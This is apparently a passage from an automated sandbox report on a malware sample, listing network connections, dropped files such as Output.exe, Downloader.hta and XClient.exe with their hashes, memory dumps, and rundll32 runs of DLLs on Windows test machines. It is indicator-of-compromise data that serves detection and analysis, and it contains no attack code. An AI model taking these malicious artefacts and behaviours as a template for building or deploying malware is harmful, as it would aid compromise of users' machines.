| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp |
Files
memory/2596-0-0x00007FFEAD683000-0x00007FFEAD685000-memory.dmp
memory/2596-1-0x00000000005E0000-0x00000000005EE000-memory.dmp
C:\Users\Admin\AppData\Roaming\Output.exe
| MD5 | a731d63dc3edd963b906d0f861f7119c |
| SHA1 | 378d5339f1b675e98c81f4446f9e9ad81bc9da9f |
| SHA256 | 94e34e1ab4c0941edda34585cb048af9b4bf4a8e3e9042e3986b597b839f4dad |
| SHA512 | 39d39f34144538fa4d822aa806e0994dacc64da2358001de2b7e07400218e60302630ed28b74a3ca293a6b20cb30fadfeb342e8f5060a083753fd4674390d0a6 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Output.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
memory/940-15-0x0000000000B00000-0x0000000000B0C000-memory.dmp
memory/940-18-0x00007FFEAD680000-0x00007FFEAE141000-memory.dmp
memory/940-19-0x00007FFEAD680000-0x00007FFEAE141000-memory.dmp
C:\Users\Admin\AppData\Roaming\Downloader.hta
| MD5 | f27fe2354ebb52cffbb3a8cf66c6bdb3 |
| SHA1 | 439ce7924db3f534a14d78470c57c98e397969ee |
| SHA256 | 30211495aba380e4649ba7a892fea8523b0857a1db4a3be3ec59a822d385a6b4 |
| SHA512 | 7e22d88538dd3d9e853002fc7caf149c047be7c17dff24061236b9a29f558d53949b2a1a46e74185e32341c1fa3e2d7b9ce3917bd5e988cd12ea380acbf33c0f |
memory/412-21-0x0000000000040000-0x0000000000050000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rfvlerlr.cle.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2488-22-0x000001D567E00000-0x000001D567E22000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3072fa0040b347c3941144486bf30c6f |
| SHA1 | e6dc84a5bd882198583653592f17af1bf8cbfc68 |
| SHA256 | da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e |
| SHA512 | 62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 15dde0683cd1ca19785d7262f554ba93 |
| SHA1 | d039c577e438546d10ac64837b05da480d06bf69 |
| SHA256 | d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961 |
| SHA512 | 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672 |
C:\Users\Admin\AppData\Roaming\XClient.exe
| MD5 | f065a5f352973e89b2e8d3efd79b98f8 |
| SHA1 | 6a9a84e0a11010262ea35790fcdf824193805c76 |
| SHA256 | 7b75950ae4eeabfdedafe9e3b14acee160a6ad932cbad66f71fe5bca32cc6405 |
| SHA512 | b920e46653ec87748767e71e88593db3c6d25fcde1b63504a1718d438e383c15578fd9e5bae5665b040e0f3512566ec99322eb8f3b5a0fa2112934ad486a2006 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:27
Platform
win10v2004-20240802-en
Max time kernel
430s
Max time network
434s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:31
Platform
win7-20240704-en
Max time kernel
359s
Max time network
362s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\IconExtractor.dll,#1
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-08-02 22:42
Reported
2024-08-03 03:32
Platform
win10v2004-20240802-en
Max time kernel
417s
Max time network
420s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\IconExtractor.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |